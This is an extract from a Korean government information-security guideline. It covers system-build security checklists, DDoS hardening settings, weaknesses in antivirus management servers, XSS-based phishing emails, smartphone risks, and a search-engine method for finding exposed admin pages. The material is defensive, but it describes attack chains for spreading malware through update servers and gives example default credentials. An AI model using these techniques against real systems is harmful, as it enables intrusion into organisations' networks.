3.10 콜센터시스템구축 < 사례 > 콜센터운용에따른시스템구축 < 그림 10> 콜센터네트워크구성도 보안대책 o 상담원이상담업무와관련된서버에한정된접속만허용토록 IP기반의접근제한정책을적용하고접속계정ㆍ비밀번호관리철저 상담PC는인터넷접속차단이원칙, 상담업무상인터넷접속이필요할경우에만부분적으로허용 o 자료열람등시스템접근내역은로그화하여 6개월이상보관 로그에는담당자, 일시, 작업내용등주요내용을포함 o 상담자개인정보등민감한정보는관계자외접근이불가능하도록관리하며외부반출및인쇄통제 o IP-PBX 등신규구축시스템에대한보안취약점사전점검ㆍ제거 o 국가ㆍ공공기관인터넷전화보안가이드라인 ( 09.5 月 ) 준수 o 용역직원감독관을지정, 업무처리내용및보안사항준수여부를수시로점검ㆍ교육 - 172 -
하는등관리철저 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제9절콜센터운용 (p54) 2 국가ㆍ공공기관인터넷전화보안가이드라인 ( 09.5 月 ) - 173 -
3.11 인터넷전화 (VoIP) 도입 < 사례 > 인터넷전화구축등 < 그림 11> 인터넷전화 (VoIP) 네트워크구성도 보안대책 o 인터넷전화데이터가소통되는全구간에대해암호적용 o 교환기ㆍ게이트웨이등인터넷전화장비보안관리철저 초기설정된관리자용 Default Passwd 반드시변경 o 공통기반구간의보안대책 ( 전용선 + 암호 ) 을철저히적용하고, 주기적점검 o 인터넷전화전용보안장비 (solution) 도입 CC인증제품을우선도입하되, 제품이없을경우선도입후검증실시 o 국가ㆍ공공기관인터넷전화보안가이드라인 (09.5 月 ) 준수 참고자료 1 국가ㆍ공공기관인터넷전화보안가이드라인 (09.5 月 ) 2 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제12절인터넷전화 (VoIP) 운용 (p68) - 174 -
3.12 정보보호제품도입 < 사례 > 방화벽ㆍ IPS ㆍ IDS ㆍ VPN ㆍ보조기억매체통제시스템등정보보호제품도입ㆍ교체 보안대책 1 방화벽, 침입탐지ㆍ방지시스템구축 o 기관의정보보호정책에맞게룰설정 o 불필요포트차단및유해사이트차단기능설정 o 탐지규칙및엔진에대한정기적업데이트수행 o 로그및이벤트로그저장설정 (6개월이상 ) o 네트워크에서의위치적절성고려 o 발생이벤트들에대한상시모니터링및긴급대응 o 가용성을위해이중화적용권고 2 가상사설망 (VPN) 구축 o 가상사설망클라이언트이용시계정관리지침작성및관리철저 o 방화벽과물리적으로분리된 VPN 장비사용시 VPN 위치는방화벽앞단에위치 o 검증필암호모듈사용 o 로그및이벤트로그저장설정 (6개월이상 ) 3 웹방화벽 o 규칙및엔진에대한정기적업데이트수행 o 로그및이벤트로그저장설정 (6개월이상 ) o 발생이벤트들에대한상시모니터링및긴급대응 4 취약점분석도구 o 최신업데이트유치및취약점분석도구를통한주기적인대상시스템점검 o 취약점분석에따른모든산출물은담당부서파일서버나지정한 PC에저장하고허가되지않은자에게제공 열람 대여금지 o 취약점분석최종결과물은대외비로관리하고, 나머지결과물은삭제 5 통합보안관리시스템 o 통합보안관리시스템과관리대상시스템간의통신수행시암호화통신처리 o 로그및이벤트로그저장설정 (6개월이상 ) o 발생이벤트들에대한상시모니터링및긴급대응 6 보조기억매체통제시스템 o 스마트폰, MP3플레이어등저장이가능한휴대용기기의접근차단 o 보안USB 사용내역에대한로그관리철저 7 DRM o 기관의정보보호정책에맞게사용자 / 그룹별, 문서보안등급별사용권한설정 - 175 -
o 사용자인증및문서사용이력에대한모든기록관리 8 보안운영체제 o 기관의정보보호정책에맞게사용자의역할에근거한접근통제정책수립 o 보안정책위반사항에대한실시간로깅및관리자통보자동설정 9 IP관리시스템 o 임의반입노트북등비인가기기접근확인시원인규명및보안조사확행 o IP 자원의사용현황관리및로깅 10 유해사이트차단시스템 o 기관의정보보호정책에맞게유해사이트접속차단정책수립 (P2P, 웹하드등차단 ) 11 NAC o 기관의정보보호정책을고려, 접근제어정책설정 참고자료 1 국가정보보안기본지침 ( 08.8 月 ) 제4장보안적합성검증 2 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제17~20절 3 정보통신망보안관리실무요령 ( 08.8 月 ) 정보보호제품 (p75~77) - 176 -
3.13 정보화사업용역업체보안관리 ( 공통 ) 보안대책 o 용역참여인원에대한변동사항을확인하고보안서약서징구, 보안사고유발시파급영향등보안교육을실시, 경각심제고 o 업체에제공한전산망구성도ㆍIP주소현황등비공개자료관리실태및인터넷연결 PC에개발ㆍ유지보수관련자료보관여부등점검 o 기관전산망접속권한계정부여현황및작업이력확인, 비인가노트북 PCㆍUSB 등에자료무단보관및반출 입여부점검 o 사업완료시용역관련제반자료전량회수, 저장매체내자료삭제및사업산출물복사본등을보관하지않는다는대표명의확약서징구 o 계약서에보안준수사항, 자료반환및위반시손해배상책임 ( 위약금부과, 향후입찰참여시감점등 ) 등보안관련특약조항명시 o 사업착수시용역업체자체보안관리및직원관리감독강화를독려하고보안의중요성인식제고를위해업체대표명의보안서약서징구 현재진행중인사업에대해서도서약서징구 참고자료 1 국가정보보안기본지침 ( 11.1 月 ) 제67조용역사업보안관리 2 국가ㆍ공공기관발주용역사업보안관리요령 ( 07.10 月 ) 3 정부정보화사업용역업체보안관리강화대책통보 ( 09.6 月 ) - 177 -
4. 보안점검표 4.1 홈페이지개설등웹시스템구축 - 178 -
4.2 업무시스템 ( 내부직원용 ) 구축 4.3 네트워크ㆍ서버등단순전산장비도입 - 179 -
4.4 외부기관과연동시스템구축 4.5 원격화상회의시스템구축 - 180 -
4.6 CCTV 시스템구축 4.7 백업시스템구축 - 181 -
4.8 무선랜운용 4.9 외부인용인터넷검색 PC 설치 4.10 콜센터시스템구축 - 182 -
4.11 인터넷전화 (VoIP) 도입 - 183 -
[ 부록 15 ] DDoS 공격대비보안강화대책 - 184 -
1. 기술적대응방안 o DDoS 대응장비ㆍ IPS ㆍ웹방화벽등보안장비의설정값은도입시설정한초기임계 값이아닌각급기관상황 ( 평시대역폭, 웹서버성능, 평시세션개수등 ) 에맞춰 자체시험한임계값으로재설정 o 트래픽처리용량이부족한네트워크장비 ( 라우터, 스위치, 방화벽등 ) 에대한성능개선 * 1G급장비로도입했다할지라도보안룰설정등으로인해 1G 성능을보장할수없는경우가많으므로자체시험결과를반영, 장비교체및성능업그레이드 o 시스템자원을고갈시키는 DDoS 공격에대응하기위해서운영중인웹서버의 OS 및환경변수를최적화 * 각기관에서운영중인웹서버의성능및접속대역폭등에따라가변적이므로자체시험후해당기관에맞는적절한값으로설정 ( 예시 1) Windows 서버설정사례 환경변수 설명 공격징후탐지시 서비스장애발생시 TcpMaxHalfOpen 허용 Half Open 세션수 512 1,024 TcpMaxHalfOpenRetried 현재 Half Open 세션수 128 256 KeepAliveTime 유효한연결확인시간 60,000 30,000 EnableDynamicBacklog Backlog 동적기능사용 1 1 MinimumDynamicBacklog 사용가능 Backlog 최소값 40 80 MaximumDynamicBacklog 최대세션개수 20,000 40,000 DynamicBacklogGrowthDelta Backlog 필요시증가량 20 20 ( 예시 2) Solaris 서버설정사례 - 185 -
환경변수 설명 공격징후탐지시 서비스장애발생시 Tcp_time_wait_interval time wait 상태시간 30,000 2,000 Tcp_conn_req_max_q Complete 큐갯수 16,384 32,768 Tcp_conn_req_max_q0 Incomplete 큐갯수 20,480 40,960 Tcp_ip_abort_cinterval Incomplete 상태의연결시간 20,000 3,000 Tcp_ip_abort_interval 송수신없는상태의연결유지 60,000 30,000 ( 예시 3) Linux 서버설정사례 환경변수 설명 공격징후탐지시 서비스장애발생시 Tcp_max_syn_backlog 서버연결대기큐크기 8,192 16,384 * 설정방법 : echo 8192 > /proc/sys/net/ipv4/tcp_max_syn_backlog o 사전에홈페이지 URL Redirection 등공격트래픽우회기법을적극활용하여 DDoS 공격 방어를위한준비철저 URL Redirection 구축방법 DDoS 공격이발생하여서비스거부현상이발견되는경우, 좀비 PC 가웹서버로부터 의응답을처리하지않는특징을이용하여 DDoS 공격대상 URL 을다른페이지로 Redirection 되도록구성 기관별준비사항 - 186 -
1 Redirect 용서버 ( 유휴서버및다수의 PC 로도구성가능 ) 웹서버하나에서 Index 페이지만새로작성ㆍ운영할경우서버는불필요 2 Redirect 안내페이지 (HTML) 사전작성 </head><body> <p> 죄송합니다, 지금접속요청이많아서비스가원활하지않습니다. 아래주소를클릭시즉시다른페이지로이동합니다. <br><br> <a href="http://www.example.com/redirect_index.html"></a> </p> </body></html> o SQL Query Attack 을방지하기위해와일드카드ㆍ특수문자등 DB 과부하를유발하는불필 요한검색어입력을차단 2. 관리적대응방안 o 각급기관은전산망을일제점검하고해당기관의전산망구성, 정보보호시스템및서버현황등을참조하여 DDoS 대응절차를자체매뉴얼로작성 교육과학기술부 DDoS 공격대응매뉴얼 을참조하여모니터링, 공격탐지, 초동조치, 분석, 차단조치등단계별로 DDoS 공격대응절차마련 o DDoS 공격발생시신속한대응조치수행을위해비상연락체계를구성ㆍ운영하고수시로연락체계점검 기구축된 사이버공격상황전파체계 와연계하여자체상황전파훈련을병행실시하고상황전파책임자및연락처변동시우리부로통보 ( 소속기관, 시도교육청, 국 공립대해당 ) o 기관별자체 DDoS 대응실전훈련을지속실시하고훈련결과를반영하여자체대응매 뉴얼및대응체계지속개선 o 가용대역폭이상의공격발생시긴급대응체계구축을위해 ISP 와협조, 유사시긴급 대역폭증설방안구축 o 주요시스템의경우 DDoS 트래픽우회서비스 (DDoS 대피소 ) 및 CDN 서비스 ( 웹가속서비스 ) 등보완대책마련 - 187 -
CDN 서비스 : 동일한데이터를가진다수의서버가여러 ISP 에분산설치되어 DDoS 공격 에의해접속자가폭주하거나장애가발생하더라도즉시다른서버에서 서비스를제공 o 공격차단조치로인해공격이진화되면서비스정상화조치와함께피해복구절차를 수행하고재발방지를위한예방책수립 - 188 -
[ 부록 16 ] 백신관리서버운용시보안관리강화대책 - 189 -
1 백신관리서버보안취약점및개선방안 1.1 SQL Injection 취약점을통한관리자권한획득 < SQL Injection 이란? > [ 취약점 ] o 백신서버 DB 에서 SQL 인젝션공격을방어하기위한특수문자예외처리가완벽하지 않는경우우회가능 17) SQL(Structured Query Language, 구조화질의어 ) 는관계형데이터베이스관리시스템에서자료의검색과관리, 데이터베이스생성과수정, 데이터베이스접근관리를위해고안된컴퓨터언어 - 190 -
o 관리콘솔에서백신관리서버 DB에접속할경우 SQL injection 취약점을이용하여관리자권한으로접속가능 o DB에접속한공격자는시스템관리자권한으로백신프로그램이설치된모든사용자 PC에해킹프로그램강제설치가능 * SQL Injection 공격이가능하면공격자는 DB 서버의관리자권한획득, 백신관리콘솔접근권한획득, 해킹프로그램설치등다양한공격가능 [ 보안대책 ] o DB 와연동되는모든명령문인자들에대해서는적절히 SQL 방어가가능하도록문 자열필터링수행 * DB 서버는저장프로시저를사용한 SQL Injection 공격도방어가능토록개발 o 관리자 IP 에서만백신관리서버로접속허용토록방화벽설정 1.2 백신업데이트서버로위장하여해킹프로그램배포 < 서버위장취약점이란? > [ 취약점 ] o 공격자는해킹이메일을기관내사용자에게발송, 사용자PC 1대를장악한후 IP Spoofing 등을통해동 PC를위장서버로구축 o 공격자가업데이트서버주소를변경토록요구하는명령과함께해킹프로그램유포를위해구축한위장서버 IP주소전송 18) IP Spoofing 은정상적인권한을가진다른컴퓨터의 IP 로자신을위장하는공격 19) ARP Poisoning 은네트워크장비 ( 스위치 ) 가통신을위해사용하는 ARP 테이블을조작하여소통되는데이터패킷을공격자가받도록조작하는공격기법 - 191 -
o PC 에이전트에서는수신된명령에대한인증없이수신된공격자의위장서버주소를자신의업데이트서버주소로변경 o 위장서버를통해사용자PC 에해킹프로그램이자동배포됨으로써기관내존재하는모든사용자PC 완전장악 [ 보안대책 ] o 정상적인백신서버나관리자콘솔에서보내는명령인지인증후실행하도록공개키 기반전자서명 (PKI) 등으로상호인증 o IP-MAC 주소목록을별도로관리하여 IP Spoofing, ARP Poisoning 공격차단기능을가 진네트워크스위치사용 1.3 업데이트파일조작을통한해킹프로그램배포 < 업데이트파일조작이란? > [ 취약점 ] o 공격자는백신서버에존재하는 SQL Injection 취약점등을이용하여백신서버를장악하고업데이트파일을해킹코드로교체 o 공격자는중간에서업데이트파일정보를임의로변조ㆍ전송한후해킹프로그램을정상파일로위장하여배포 o PC에이전트에서는무결성검사를하지않거나공격자가보낸변조된업데이트정보만확인함으로써공격자가보낸해킹프로그램설치 * 무결성검사 : 파일이비정상적인방법으로인해변경되었는지확인하는절차 - 192 -
[ 보안대책 ] o 업데이트파일정보전송시백신관리서버의개인키로서명하고파일정보에해쉬 (hash) 값을포함하여전송 * 무결성검사를위해 CRCㆍMD5 보다강력한해쉬알고리즘인 SHA-1 사용권장 o 백신서버의개인키로전자서명된값을확인하여업데이트파일정보가중간에변조가되었는지여부확인 * 서버에서업데이트파일정보를전송해주는경우, PC에이전트는업데이트파일정보에포함된해쉬값과다운로드받은파일의해쉬값을비교하여무결성검사 1.4 디폴트계정을이용한백신관리서버해킹 < 디폴트계정취약점이란? > [ 취약점 ] o 백신관리서버및 DB 설치시디폴트계정이자동생성되는경우공격자는디폴트계 정을이용하여 DB 에정상접근가능 * 예 ) ID : user, PW : admin123, 123456 등 o 일부백신관리서버는레지스트리특정위치에관리자콘솔프로그램의로그인아이 디및비밀번호를평문으로저장 o DB 에접속한공격자는시스템관리자권한으로백신프로그램이설치된모든사용자 PC 에해킹프로그램강제설치가능 20) 디폴트계정 (default account) 은시스템출하시기본으로설치되는사용자아이디 (ID) 및비밀번호 - 193 -
[ 보안대책 ] o 백신서버설치시생성되는디폴트 DB 계정은삭제하고설치완료후사용자로부터계 정정보를새로입력받아사용 o 레지스트리등 PC 에로그인아이디및비밀번호가평문으로저장되는경우, 관리자아 이디및비밀번호삭제 1.5 인증우회를통한관리자권한획득 < 인증우회취약점이란? > [ 취약점 ] o 공격자는관리자콘솔이보낸명령인지확인하는절차를우회토록관리자콘솔프로 그램을변조 ( 무인증관리콘솔제작 ) o 공격자는무인증관리콘솔을이용하여백신서버에접속하여기관내모든사용자 PC 에 해킹프로그램을설치하도록명령 o 정상적인권한을가진백신업데이트서버에의해해킹프로그램이자동설치됨으로써 사용자 PC 완전장악 [ 보안대책 ] o 로그인하는과정에서아이디, 비밀번호등으로정상사용자여부를인증한후인증된통신세션을지속적으로유지 * 일부시스템은인증세션을유지하지않고관리콘솔이명령마다새로운통신세션을열어사용함으로써공격자가우회가능 o 프로그램변조를통한관리자콘솔확인절차우회방지 - 194 -
1.6 응용 S/W 취약점을이용하여백신관리서버해킹 < 응용 S/W 취약점공격이란? > [ 취약점 ] o 응용 S/W 의취약점과보안패치가발표될때해당 S/W 를사용하는서버에서보안패 치가적용되지않아취약점발생 o 공격자는백신관리서버에설치된응용 S/W 를찾아내고, 식별된모든 S/W 의취약점 을인터넷을통해검색 o 공격자는발견된응용 S/W 취약점을악용하여백신관리서버를해킹한후에모든 사용자 PC 에해킹프로그램을설치토록명령 [ 보안대책 ] o 서버운영체제및설치된응용 S/W 의보안패치여부를상시확인하여보안패치가 발표될경우즉각적용 * 국정원 ( 국가사이버안전센터 ) 이배포하는보안권고문을확인하여즉시적용 - 195 -
2 침입차단시스템(방화벽) 운영정책 o 침입차단시스템은 외부로부터 백신관리서버로의 모든 접속을 차단하고 업데이트를 위한 중앙업데이트서버 접속은 특정포트만 허용 o 백신 에이전트가 설치된 사용자PC는 백신관리서버들의 서비스 포트(사전에 정의된 특정포트)에만 접속을 허용토록 설정 1) 메인 백신관리서버로만 구성 시 침입차단시스템 설정 DB 서버 (업체) 중앙 업데이트 서버 백신/패치 백신/패치 관리 서버 관리 콘솔 업무 서버 영역 침입차단 시스템 인터넷 사용자 PC 영역 PC PC PC 백신/패치 에이전트 서버 업데이트 에이전트 업데이트 및 관리 출발지 IP 백신관리서버 내부 사용자PC 백신관리서버 관리자용 콘솔 관리자용 콘솔 외부 IP 내부 PC 목적지 IP 백신社 중앙 업데이트서버 백신관리서버 백신DB 백신관리서버 내부 PC 백신관리서버 백신관리서버 포트 정책 80 특정 포트 특정 포트 특정 포트 특정 포트 ALL ALL - 196 - 허용 허용 허용 허용 허용 차단 차단 용 도 백신 업데이트 허용 명령 및 업데이트파일 수신 내부 DB 연결 허용 백신서버 관리를 위해 허용 관리자용 콘솔로부터의 명령 수신 허용 외부에서 내부 백신관리 서버로의 불필요 접속 차단 사용자PC에서 백신관리 서버로의 불필요 접속 차단
2) 메인 관리서버와 보조 관리서버로 구성될시 침입차단시스템 설정 DB 서버 백신/패치관리 백신/패치 메인서버 관리 콘솔 DB 서버 백신/패치관리 백신/패치 보조서버 관리 콘솔 상위 서버 영역 침입차단 시스템 하위 서버 영역 (업체)중앙 업데이트 서버 침입차단 시스템 인터넷 사용자 PC 영역 PC PC PC 백신/패치 에이전트 서버 업데이트 에이전트 업데이트 및 관리 출발지 IP 목적지 IP 백신관리서버 보조 백신관리서버 보조 백신관리서버 내부 사용자PC 백신관리서버 관리자용 콘솔 관리자용 콘솔 백신社 중앙 업데이트서버 메인 백신관리서버 메인 백신관리서버 백신관리서버 백신DB 백신관리서버 내부 PC 외부 IP 백신관리서버 내부 PC 백신관리서버 포트 정책 용 도 80 허용 백신 업데이트 허용 80 허용 백신 업데이트 허용 특정 포트 특정 포트 특정 포트 특정 포트 특정 포트 허용 허용 허용 허용 허용 ALL 차단 ALL 차단 - 197 - PC 에이전트 정보 전송 명령 및 업데이트파일 수신 내부 DB 연결 허용 백신서버 관리를 위해 허용 관리자용 콘솔로부터의 명령 수신 허용 외부에서 내부 백신관리 서버로의 불필요 접속 차단 사용자PC에서 백신관리 서버로의 불필요 접속 차단
3 관리적보안대책 o 백신관리서버는업무서버영역에위치시키며비인가자의임의조작이물리적으로불가능하도록통제구역에운영 o 백신관리서버및 DB서버에기본으로설치되는디폴트계정은삭제하고시스템운영시관리자계정을별도로생성 o 사용자 PC에설치되는에이전트프로그램은최신백신엔진이설치되어있지않을경우설치를유도토록경고창표시 o 업무망분리기관의경우, 업무망영역의백신서버업데이트는보안USB 등을이용하여오프라인으로실시 * 필요시망연동중계시스템을이용하여업데이트파일일방향전송가능 o 업무망영역의백신관리서버도최신업데이트여부를주기적으로확인하여항상최신 버전으로유지 - 198 -
4 공개키기반암호화통신 ( 백신서버 PC 간 ) 방법 o 백신업데이트를위해공개키기반암호화통신을적용하면상호인증, 기밀성, 무결성을 보장할수있어안전한업데이트가능 * 공개키 (PKI) 기반구조는인터넷사용자들이신뢰할수있는기관에서부여한한쌍의 공개키와개인키를사용하는방식으로인터넷뱅킹이나전자서명등에사용 o 대칭키암호화통신방식도사용가능하나암호체계상키값을매번교환해야하고 PC 內메모리에존재, 취약점이존재할경우손쉽게암호키유출이가능하므로공개키 기반의암호화통신방식권고 o 백신서버와사용자 PC 에설치된백신프로그램 ( 에이전트 ) 간통신을공개키기반으로암 호화하여정당한사용자인지상호인증 [ 그림 2] PKI 를이용한안전한업데이트동작과정 - 199 -
[ 부록 17 ] 신종해킹메일유형및긴급보안조치대책 - 200 -
1. 신종해킹메일특징 가. 해커는지인또는국가ㆍ공공기관에서업무관련메일로위장 * 발신자명, 메일명을수시로변경나. 위장해킹메일발송사례 다. 동해킹메일수신자가수신함에서메일제목을클릭하면재로그인화면을위장한피싱사이트로자동접속하고메일접속용 IDㆍ비밀번호를다시입력토록유도 * 美 MS 社핫메일, 다음社한메일, KTH 社파란메일, SK컴社네이트메일각각의 XSS 취약점을악용, 메일제목을클릭한순간화면을피싱사이트로자동전환 - 201 -
메일제목클릭시로그인화면으로 자동전환 1.4 국회금융정책연구회안내문입니다 제하해킹메일수신화면 라. 메일수신자가로그인화면에서다시 IDㆍ비밀번호입력시해킹경유지로접속ID 및비밀번호가유출마. 再로그인화면이표시되는순간, PDF 뷰어의취약점을악용, 악성코드설치 2. 긴급보안조치사항 가. 업무망ㆍ인터넷분리기관 o 인터넷 PC에서상용메일사용은허용하되상용메일을이용한업무자료송수신금지 * 해커는주로익명으로손쉽게가입할수있는해외상용메일계정을악용하고, 발신자명의만국내인으로가장하여발송 o 공직자가사용하는상용메일비밀번호는반듯이변경요망 o 인터넷 PC에업무관련자료저장금지, 정기적으로 PC 초기화 나. 업무망ㆍ인터넷미분리기관은상용메일접속을차단하고기관메일또는공직자통합메일만 사용토록재강조 다. 메일사용중아이디ㆍ비밀번호재입력공지발생등해킹메일수신의심시에는교육과학기술 부사이버안전센터 (02-2118-1777, cert1@ecsc.go.kr, 042-869-0808, sntsec@kisti.re.kr) 에즉시통보 라. 메일제목열람만으로스크립트가실행되므로 XSS 취약점방지를위해메일서버운영기관은 메일본문에 HTML 사용금지조치 - 202 -
마. 첨부파일은가급적인터넷과연결되지않은안전한 PC 에서최신백신프로그램으로점검후열람, 지인이보낸메일이라도의심스러우면사전실제발송여부등을유선확인후열람 바. 인터넷 PC 에업무관련내용작성ㆍ저장금지및非인가정보통신기기 (USB 메모리, 노트북 PC 등 ) 접 속금지 사. 인터넷 PC 에 P2P ㆍ웹하드ㆍ메신저등해킹취약프로그램설치금지 아. 설치ㆍ운용중인전 PC 대상 PDF 뷰어보안취약점개선 o PDF 리더최신보안패치반드시실행 PDF 리더실행 도움말 업데이트확인 지금설치 o 웹브라우저창내에서 PDF 를자동으로열람하는기능정지 PDF 리더실행 편집 기본설정 인터넷 브라우저에 PDF 표시 해제 - 203 -
[ 부록 18 ] 스마트폰도입시보안대책 - 204 -
1. 스마트폰업무활용 추진사례가. 청사內무선랜시스템을구축, 내부정보시스템과스마트폰을상호연결, 전자결재ㆍ이메일등업무처리나. 스마트폰과연결된무선인터넷망ㆍ이동통신社망을활용, 외부에서내부정보시스템에접속, 전자결재ㆍ이메일등업무처리다. 통신비용을절감하기위해인터넷전화 S/W를설치, 스마트폰을사무실구내전화로사용라. 스마트폰에별도업무용 S/W를설치, 현장단속ㆍ외부작업등원격업무처리에사용마. 동작원리 ( 예시 ) 청사내부 1 스마트폰에설치된전자결재시스템ㆍ인터넷전화접속用프로그램동작 2 무선랜기술을활용, 내부전산망접속 3 전자결재서버, 메일서버, 인터넷전화교환기등내부시스템처리 청사외부 4 스마트폰에설치된전자결재시스템ㆍ기관메일프로그램동작 5 이동통신社네트워크활용, 내부전산망접속 6 전자결재서버, 메일서버등내부시스템처리 - 205 -
2. 보안취약점 휴대중분실 가. 분실시습득자가스마트폰內전화번호ㆍ문자메시지등개인정보및저장된각종자료유출위험이상존 악성코드감염 나. 모바일웜ㆍ바이러스감염시저장된자료유출, 오작동위험이있으며스마트폰을좀비 PC 化하여 DDoS 공격에악용가능할뿐만아니라업무PC 에접속시내부망에웜ㆍ바이러스전이 이동저장매체化 다. 스마트폰을내부 PC에연결시, PC는스마트폰을이동형저장매체로인식하며업무자료무단복사ㆍ유출장비로악용가능 무선랜해킹 라. 사용자가통상편의성을이유로보안이취약한무선랜공유기 (AP) 에접속함에따라자료유출ㆍ해킹공격에무방비마. 각급기관에서스마트폰을업무에활용코자무선랜시스템을연결시비인가자가외부에공개되는무선특성을惡用, 무선랜전산망을무단으로접속시도하고소통되는자료절취공격가능바. 공격자가정상적인무선랜공유기 (AP) 로위장하는피싱 (Phishing) 공격및민간에서운용중인무선랜공유기와혼용우려 인터넷전화스니핑 (Sniffing) 사. 요금절약목적으로인터넷전화프로그램을별도설치ㆍ사용시스니핑등해킹에취약아. 소통자료를미암호화할경우전산망에서스니핑가능성이있으며스마트폰내악성코드등을통해음성유출위험도상존 업무용서버공격경로화 자. 각급기관에서스마트폰을업무에활용할목적으로기관망과연결시해커가내부시스템에침투하는해킹경로로악용가능 - 206 -
* 외부인터넷 스마트폰 기관망 해킹경로로악용 3. 보안대책가. 스마트폰활용범위 1 스마트폰으로전자결재, 기관메일열람등의사용은해킹및자료유출위험차단을위해별도보완책마련시까지제한 2 정부예산절감차원에서스마트폰으로구내전화 ( 인터넷전화 ) 활용시에는암호화, 방화벽설치등도청방지대책수립 * 일반직원이휴대폰대용으로스마트폰을사용함은 IT기술추세를고려하여허용하되, 업무PC와접속차단등보안대책강구나. 스마트폰잠금기능설정및응용프로그램설치시별도패스워드입력등인증기능을보강다. 블루투스등을통한스마트폰의웜ㆍ바이러스감염방지를위해모바일전용바이러스백신설치 * 모바일바이러스백신은국가정보원에별도안전성검토신청 ( 문의 02-3432-0461) 라. 업무용 PC에스마트폰연결을통한자료유출, 웜ㆍ바이러스전이등을방지하기위하여보안 USB관리시스템등을활용, 기술적차단마. 무선랜네트워크는침입차단시스템등정보보호시스템을활용, 내부업무망과분리, 별도망으로구성하고인증ㆍ암호화강화 (VPN 등 ) 바. 불법 AP, Ad HoC 연결, 단말기피싱공격등무선보안위협을차단하기위해무선전용침입방지시스템운용등보안대책강구사. 인터넷전화는통신내용을암호화하고유선전화일부회선유지 * 국가ㆍ공공기관인터넷전화보안가이드라인 ( 국정원,09.6 月 ) 준수아. 이동통신社망을통한각급기관내부정보시스템접근통제자. 직원대상스마트폰사용시보안준수사항을교육하는등보안인식제고활동실시차. 스마트폰업무활용을위한정보화사업추진시, 국가정보원사전보안성검토확행 - 207 -
[ 부록 19 ] 관리자페이지인터넷노출점검및개선조치방법 - 208 -
1. 관리자페이지노출점검 가. 웹브라우저주소창에서 www.google.co.kr 입력하여접속 나. Google 사이트에서 " 고급검색 " 클릭 Click 다. 도메인설정 부분에점검대상웹사이트주소입력 시스템별 URL 명 ( 예 : www.mopas.go.kr) 대신, 기관전체도메인 ( 예 : mopas.go.kr) 을입 력하여점검가능 웹사이트주소입력 - 209 -
라. " 검색어설정 " 코너에 admin 등입력, Google 검색 버튼클릭 admin 대신 "administrator", " 관리자 ", Root, "master", system" 또는관리 자페이지디렉토리명등을입력하여점검가능 Clic 마. 검색결과의각항목을클릭하여관리자페이지노출여부확인 - 210 -
2. 관리자페이지노출방지조치 가. 웹사이트상에서조치사항 1 관리자페이지의 IP 주소를일반인이추측하기어려운명칭으로수정 - ( 방법 1) 네임서버에서 admin' 도메인명을 'nkh1358' 등으로변경 예시 ) http://admin.xxx.xx.kr http://nkh1358.xxx.xx.kr - ( 방법 2) 웹서버에서 admin' 디렉토리명을 'ayxzct587' 등으로변경 예시 ) http://www.xxx.xx.kr/admin/x.jsp http://www.xxx.xx.kr/ayxzct587 2 관리자페이지는지정된관리자단말 PC( 내부 IP) 에서만접속가능하도록설정 - 웹서버내에관리자 PC 의 IP 와같이지정된 IP 를필터링하는기능적용 3 관리자계정의 ID 와패스워드는모두추측하기어려운안전한 ID 와패스워드로변경 - admin, 1234, 1111, 1 등추측가능한 ID 와패스워드는사용금지 - 상용 S/W 의기본관리자계정은사용금지 4 사용자인증 접근통제과정이없는관리자페이지에대한인증및접근권한절차추가 5 홈페이지개편등으로현재사용되지않는휴면홈페이지를일제조사하여위와같은 절차로노출여부를점검후삭제 휴면홈페이지사례 나. 구글검색사이트에대한조치사항 1 구글에회원가입및로그인하여구글자동삭제시스템에접속 삭제시스템 : https://www.google.com/webmasters/tools/removals?hl=ko 2 웹페이지요청도구에서 Google 검색결과에서시한이지났거나 사용하지않는링크 로 서, 404- 파일을찾을수없음오류에해당되는링크입니다 를선택하고 다음 버 튼을클릭 - 211 -
3 Google 웹검색결과 를선택한후, 웹페이지또는이미지 URL 에노출된관 리자페이지 URL 을입력하고 요청제출 을클릭 ( 이때, 구글캐쉬주소를입력하 면삭제처리가되지않으므로주의요망 ) 4 자동삭제처리시스템에서 새제거요청 을클릭하여삭제요청된정보와처리상 태를확인 - 212 -
- 213 -
[ 부록 20 ] 주요사이버위협요소별보안강화대책 - 214 -
1. 특정조직ㆍ공직자대상고도화된 제로데이공격 [ 공격유형 ] o 특정업무수행공직자또는기관을대상으로국내 외사회적이슈를포함하는악성코드제작후이메일, 메신저등을통해감염유도 o 동창회홈페이지등취약한웹서버를해킹한후악성스크립트를삽입하여홈페이지방문자 PC에악성코드설치 [ 홈페이지해킹, 제로데이취약점을이용한공격 ] [ 보안강화대책 ] o 사용자 PC 보안관리강화 - 윈도우 OS, 한글등설치 운영중인소프트웨어에대한자동업데이트설정을통해최신보안업데이트를유지하고, 사용자 PC에윈도우방화벽을사용하여비인가접근을차단 - 윈도우 OS 자동업데이트설정 [ 시작 -설정 -제어판 -자동업데이트 ] 를실행한후윈도우자동업데이트선택 윈도우 OS 수동업데이트 URL : www.update.microsoft.com - 215 -
[ 윈도우 OS 자동업데이트설정 ] - 한글프로그램자동업데이트설정 [ 메뉴 - 도움말 - 한글과컴퓨터자동업데이트 ] 를실행한후자동업데이트선택 한글 S/W 수동업데이트 URL : www.hancom.co.kr/download.downpu.do [ 한글프로그램자동업데이트설정 ] - 윈도우방화벽설정을통한비인가사용자접근차단 [ 시작 - 설정 - 제어판 - 윈도우방화벽 ] 을실행한후방화벽사용선택 - 216 -
[ 윈도우방화벽설정 ] - 응용프로그램보안취약점발표시신속한보안패치를실시하고, 제로데이취약점인경우보안패치가제공되기전까지해당업체가권고하는임시대응방안준수 - 업무망 인터넷 PC에최신백신 S/W를설치하고실시간감시및정기적인정밀검사를실시 윈도우 7 등의 64비트 OS 사용시 64비트전용백신프로그램설치후사용 - 유관기관, 거래업체등업무와밀접한관련이있는기관으로부터수신되는자료는반드시백신검사후열람 o 각급기관예방보안활동강화 - 교과부사이버안전센터보안권고문, 윈도우업데이트세부사항, 정보보안관련뉴스등업무포털게시판에주기적공지 - 사이버보안진단의날 월 1회 ( 매월셋째수요일 ) 수행후취약점보완조치 o 시스템관리자전산망 장비보안강화 - 네트워크 서버 정보보호시스템최신보안업데이트유지 - 침입차단 침입탐지시스템등정보보호시스템최신탐지룰업데이트유지, 주기적로그점검을통한이상여부확인 - 홈페이지유지 보수에사용되는관리자계정은외부에서접근이불가능하도록침입차단 